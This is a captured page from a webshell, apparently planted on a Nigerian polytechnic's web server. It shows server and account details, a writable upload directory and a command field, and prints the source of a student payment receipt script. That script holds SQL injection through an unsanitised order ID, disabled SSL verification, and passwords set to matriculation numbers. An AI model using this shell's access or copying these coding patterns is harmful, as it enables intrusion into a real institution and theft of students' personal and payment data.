403Webshell
Server IP : 172.64.80.1  /  Your IP : 172.70.131.126
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/entranceform/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/entranceform/receipt-page.php
<?php
if(session_id() == '') {
    session_start();
    $ptype=$_SESSION['ptype'];
}
$matNo=$_SESSION['formNo'];
require 'remita_constantsAcc.php';
$orderID = "";
if( isset( $_GET['orderID'] )) {
$orderID = $_GET["orderID"];
}
$response_code ="";
$rrr = "";
$response_message = "";
//Verify Transaction
function remita_transaction_details($orderId){
		$mert =  MERCHANTID;
		$api_key =  APIKEY;
		$concatString = $orderId . $api_key . $mert;
		$hash = hash('sha512', $concatString);
		$url 	= CHECKSTATUSURL . '/' . $mert  . '/' . $orderId . '/' . $hash . '/' . 'orderstatus.reg';
		//  Initiate curl
		$ch = curl_init();
		// Disable SSL verification
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
		// Will return the response, if false it print the response
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
		// Set the url
		curl_setopt($ch, CURLOPT_URL,$url);
		// Execute
		$result=curl_exec($ch);
		// Closing
		curl_close($ch);
		$response = json_decode($result, true);
		return $response;
	}
	if($orderID !=null){
		$response = remita_transaction_details($orderID);
		$response_code = $response['status'];
		if (isset($response['RRR']))
			{
			$rrr = $response['RRR'];
			}
			$response_message = $response['message'];
	}
?>
<html>
<head>
<title></title>
</head>
<body>
<table width="50%" align="center" cellpadding="3" cellspacing="5">
  <tr>
    <td align="center"><img src="../images/edebanner2.png" width="731" height="95"></td>
  </tr>
  <tr>
    <td><fieldset><legend>Payment Detail</legend>
	<div style="text-align: center;">
		<?php if($response_code == '01' || $response_code == '00') { ?>
		<h2>Transaction Successful</h2>

		<p><b>Remita Retrieval Reference: </b><?php echo $rrr; ?><p>
        <p><b>Transaction ID: </b><?php echo $orderID; ?><p>
        <?php
		if ($ptype=='Acceptance Fee'){
     echo '<a href="../admin_student/print/acceptancePrint.php" target="_blank">Click Here to Print Acceptance Receipt</a>';
	// echo '<br><a href="../admin_student/print/admissionLetter.php" target="_blank">Print Admission Letter</a>';
	 //echo '<br><a href="adminStatus_process.php" target="_blank">Proceed to School Fees</a>';
	 
		}else{
			     echo'   <a href="../admin_student/print/schoolFeePrint.php" target="_blank">Click Here to Print School Receipt</a>';
		}
		?>
		<?php
		        $transApproved='True';
				$remitaRRR=$rrr;
				$transDate=date('y/m/d h:i:s a');
				$transStatus=$response_code;
				$transDetail=$response_message;
		 }else if($response_code == '021') { ?>
						<h2>RRR Generated Successfully</h2>
						<p><b>Remita Retrieval Reference: </b><?php echo $rrr; ?><p>
		<?php
				 $transApproved='False';
				$remitaRRR=$rrr;
				$transDate=date('y/m/d h:i:s a');
				$transStatus=$response_code;
				$transDetail=$response_message;
		}else{ ?>
						<h2>Your Transaction was not Successful</h2>
						<?php
				$transApproved='False';
				$remitaRRR=$rrr;
				$transDate=date('y/m/d h:i:s a');
				$transStatus=$response_code;
				$transDetail=$response_message;
						if ($rrr !=null){ ?>
						 <p>Your Remita Retrieval Reference is <span><b><?php echo $rrr; ?></b></span><br />
						<?php } ?> 
						  <p><b>Reason: </b><?php echo $response_message; ?><p>
		 <?php }
		require_once('../connect.php');
         $db=db_connect();
			require('../filetoU/logFile.php');
$logD='Payment. OrderID: '.$orderID.' PaymentType: '.$ptype;
logDetail($matNo,$logD);
		 $db->query("UPDATE `fedpoly`.`remitaorder` SET `remitaRRR` = '$remitaRRR',`transDate` = '$transDate',`transStatus` = '$transStatus',`transDetail` = '$transDetail',`transApproved` ='$transApproved' WHERE `remitaorder`.`orderID` ='$orderID'");

		 //inserting data to realdata table
		 if ($ptype=='Acceptance Fee'){

         $k=($db->query("select * from remitaorder where regNo='$matNo'and paymentType='Acceptance Fee' and transApproved='True'")->rowCount());
         if ($k>0) {
             $cardGet = $db->query("select * from stddata where formNo='$matNo' or jambNo='$matNo'");
             $cardGet_fetch = $cardGet->fetch(PDO::FETCH_BOTH);
             if ($numGet = $cardGet->rowCount() > 0) {

                 $admittedGet = $db->query("select * from admitted where formNo='$matNo'");
                 $admittedGet_fetch = $admittedGet->fetch(PDO::FETCH_BOTH);

                 if ($admittedGet->rowCount() > 0) {
                     $names = $cardGet_fetch['surname'] . ' ' . $cardGet_fetch['otherNames'];
                     $names = str_replace("'", "''", $names);
                     $course = $cardGet_fetch['option'];
                     $levelID = $admittedGet_fetch['levelID'];
                     $address = $cardGet_fetch['address'];
                     $state = $cardGet_fetch['state'];
                     $lga = $cardGet_fetch['lga'];
                     $email = $cardGet_fetch['email'];
                     $gsm = $cardGet_fetch['gsm'];
                     $ausername = $admittedGet_fetch['formNo'];
                     $apassword = $admittedGet_fetch['formNo'];
                     $mode = $admittedGet_fetch['mode'];
                     $dob = $cardGet_fetch['dob'];
                     $sex = $cardGet_fetch['sex'];
                     /*=======================================================================
                      $k=$db->query("select * from remitaorder where regNo='$matNo'and paymentType='Acceptance Fee' and transApproved='True'")->rowCount();
                               if ($k>0){
                                   $cardGet=$db->query("select * from admitted where formNo='$matNo'");
                                    $numGet=$cardGet->rowCount();
                                   $cardGet_fetch=$cardGet->fetch(PDO::FETCH_BOTH);
                     //echo $numGet;
                                   //die();
                                    if ($numGet>0){
                                        $names=$cardGet_fetch['names'];
                                        $names=str_replace("'","''",$names);
                                        $course=$cardGet_fetch['course'];
                                         $levelID=$cardGet_fetch['levelID'];
                                     $address=$cardGet_fetch['address'];
                                     $state=$cardGet_fetch['state'];
                                 $lga=$cardGet_fetch['lga'];
                                 $email=$cardGet_fetch['email'];
                                 $gsm=$cardGet_fetch['gsm'];
                                 $ausername=$cardGet_fetch['formNo'];
                                 $apassword=$cardGet_fetch['formNo'];
                                 $mode=$cardGet_fetch['mode'];
                                 $dob=$cardGet_fetch['dob'];
                                 $sex=$cardGet_fetch['sex'];
                         */

                     $db->query("INSERT INTO `fedpoly`.`realdata`
(`sn`, `formNo`, `matNo`, `names`, `course`, `levelID`, `mode`, `state`, `lga`, `dob`, `gsm`, `sex`, `address`, `email`, `usernamea`, `passworda`, `fresher`) VALUES
(NULL, '$matNo', '$matNo', '$names', '$course', '$levelID', '$mode', '$state', '$lga', '$dob', '$gsm', '$sex', '$address', '$email', '$matNo', '$matNo', 2)");
                 }
             }
         }
		 }else{
	
	//repeater
	
	$pValue=$db->query("select orderID from remitaorder where orderID='$orderID' and transApproved='True' and paymenttype='School Fees'")->rowCount();
//	if (($transApproved=='True') and ($ptype=='School Fees')){
	if ($pValue>0){
		if (isset($_SESSION['repeater'])){
            if ($db->query("select * from realdata where matNo='$matNo' and status='Repeater'")->rowCount()!=1){
                if ($_SESSION['repeater']=='Repeater'){
                    $levelID=$levelID-1;
                    $db->query("update realdata set levelID='$levelID',status='Repeater' where matNo='$matNo'");
                }
            }
		}
		
		//Generate Matric Number-
		
		//$arrayN=array(54=>'MB201500054',253=>'AH201500253',97=>'ST201500097PT',92=>'201500092',99=>'PM201500099', 101=>'CS201500101',115='201500115');
		
		$mSQL="select * from realdata where formNo='$matNo' and matNo='$matNo' and fresher='2'";
		$mResult=$db->query($mSQL);
		 $mNum=$mResult->rowCount();

		if ($mNum>0){
			//generate prefix and sufix
			$deptID=$_SESSION['deptID'] ;
            $levelID=$_SESSION['levelID'] ;
			$prefixQ=$db->query("select * from dept where sn='$deptID'");
            $prefixQ_fetch=$prefixQ->fetch(PDO::FETCH_BOTH);
			 $numPrefix=$prefixQ->rowCount();
			if ($numPrefix>0){
				if ($levelID=='1'){
					$prefix=$prefixQ_fetch['nd'];
					$sufix='';
				}elseif($levelID=='3'){
					$prefix=$prefixQ_fetch['hnd'];
					$sufix='';
				}elseif($levelID=='5'){
					$prefix=$prefixQ_fetch['nd'];
					$sufix='PT';
				}elseif($levelID=='8'){
					$prefix=$prefixQ_fetch['nd'];
					$sufix='DPT';
				}elseif($levelID=='10'){
					$prefix=$prefixQ_fetch['nd'];
					$sufix='';
				}
			}
			//End of prefix and sufix
			//generate serial Number
			$matSQL="select * from realdata where fresher='20'";
			$matResult=$db->query($matSQL);
			$matNum=$matResult->rowCount();
			if ($matNum>0){
				$realNo=$matNum+1;
				if ($realNo<10){
					$serialNo='20160000'.$realNo;
				}elseif($realNo<100){
					$serialNo='2016000'.$realNo;
				}elseif($realNo<1000){
					$serialNo='201600'.$realNo;
				}elseif($realNo<10000){
				$serialNo='20160'.$realNo;
				}else{
					$serialNo='2016'.$realNo;
				}
				$newMatNo=$prefix.$serialNo.$sufix;
				$db->query("UPDATE `fedpoly`.`realdata` SET `matNo` = '$newMatNo',`usernamea` = '$newMatNo',`passworda` = '$newMatNo',`fresher` = '20' WHERE `realdata`.`formNo` ='$matNo'");
				$db->query("UPDATE `fedpoly`.`remitaorder` SET `regNo` = '$newMatNo' WHERE `remitaorder`.`orderID` ='$orderID'");

				$_SESSION['matNo']=$newMatNo;
				echo '<h2 style="color: #FF0000"><br> Note: Your Username and Password is now '.$newMatNo.'</h2>';
			}
		}
//end of generating serial number	
		}
		
		//End of generation
		
		

	
	
	
	 // end
		 
		 
		 
		 }
		 
		 
		 ?>
          <br><a href="../index.php" target="_blank">Back to Home Page</a>
	</div>
    </fieldset>
</td>
  </tr>
</table>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit